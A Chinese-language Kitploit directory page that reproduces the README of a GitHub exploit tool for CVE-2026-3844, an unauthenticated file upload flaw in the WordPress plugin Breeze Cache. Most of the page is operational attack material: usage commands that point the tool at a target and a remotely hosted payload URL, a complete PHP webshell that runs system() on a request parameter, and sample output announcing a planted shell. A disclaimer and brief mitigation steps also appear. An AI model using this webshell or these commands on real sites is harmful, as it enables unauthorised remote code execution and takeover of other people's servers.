Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - 未认证的任意文件上传 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
漏洞扫描器漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - 未认证的任意文件上传

查看仓库
1124个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - 未认证的任意文件上传

MIT License Python 3.6+ WordPress


⚠️ 免责声明

root@kitploit:~
本工具仅供教育和安全研究目的使用。
未经授权访问计算机系统是违法的。请仅在您拥有或获得明确测试许可的系统上使用本工具。
作者对本软件的任何滥用或造成的损害不承担任何责任。

📋 描述

CVE-2026-3844 是 WordPress 的 Breeze Cache 插件(版本 ≤ 2.4.4)中的一个严重未认证任意文件上传漏洞。该插件未能正确验证评论中的 srcset 参数,允许远程攻击者向服务器上传恶意文件(包括 WebShell)。

🔴 严重性

  • CVSS 评分:9.8(严重)
  • 攻击向量:网络
  • 是否需要认证:否
  • 影响:远程代码执行(RCE)

🎯 受影响版本

  • Breeze Cache ≤ 2.4.4
  • WordPress 所有版本(取决于插件)

🔧 技术细节

该漏洞利用了 Breeze 中的 Gravatar 缓存功能。当发布一条包含特制 srcset 参数(其中包含远程文件 URL)的评论时,Breeze 会下载并将该文件存储在本地:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]

前提条件:必须在 Breeze 设置中启用“本地托管文件 - Gravatars”选项。

🚀 安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# 安装依赖
pip install pycurl termcolor

💻 使用方法

基本用法

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

高级选项

root@kitploit:~
# 仅检查目标是否存在漏洞,不进行利用
python3 CVE-2026-3844.py -u http://target.com --check-only

# 使用自定义 Payload URL
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# 将输出保存到文件
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# 为响应较慢的目标增加超时时间
python3 CVE-2026-3844.py -u http://target.com --timeout 30

命令行参数

📝 自定义 Payload 示例

创建您自己的 WebShell(shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

将其托管在可访问的位置,然后使用:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 验证字符串

该漏洞利用工具会自动检查上传文件中是否存在验证字符串 4356452d323032362d33383434(十六进制编码的“CVE-2026-3844”),以确认利用成功。

🛡️ 缓解措施

  1. 将 Breeze Cache 更新到 2.4.5 或更高版本
  2. 如果不需要,请禁用“本地托管文件 - Gravatars”
  3. 实施 Web 应用防火墙(WAF)规则
  4. 定期审计评论功能

📸 截图

root@kitploit:~
[*] 阶段 1:漏洞评估
[*] 正在检查 Breeze 插件版本...
[+] 目标存在漏洞(Breeze v2.4.4)

[*] 阶段 2:利用
[!] 要求:必须启用“本地托管文件 - Gravatars”
[*] 步骤 1:发送恶意评论...
[+] 评论发布成功
[*] 步骤 2:等待 Breeze 缓存文件...
[*] 步骤 3:检查上传的文件...
[+] 文件位于:http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] 找到验证字符串 - 利用成功!

[✓] 状态:成功
[✓] WebShell URL:http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 目录结构

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # 主漏洞利用脚本
├── README.md            # 本文件
└── LICENSE              # MIT 许可证

📄 许可证

本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。

🙏 致谢

  • 作者:0xgh057r3c0n
  • 发现:安全研究团队
  • CVE ID:CVE-2026-3844

📞 联系方式

  • GitHub:@0xgh057r3c0n
  • 报告问题:GitHub Issues

⭐ 支持

如果您觉得此工具实用,请在 GitHub 上给它一个星标 ⭐!


使用 🐍 Python 构建 | 仅供教育目的使用
下载工具
参数描述
-u, --url目标 URL(必填)
-p, --payload远程 Payload URL
--timeout请求超时时间(秒,默认:15)
--check-only仅检查目标是否存在漏洞
-o, --output将 Shell URL 保存到文件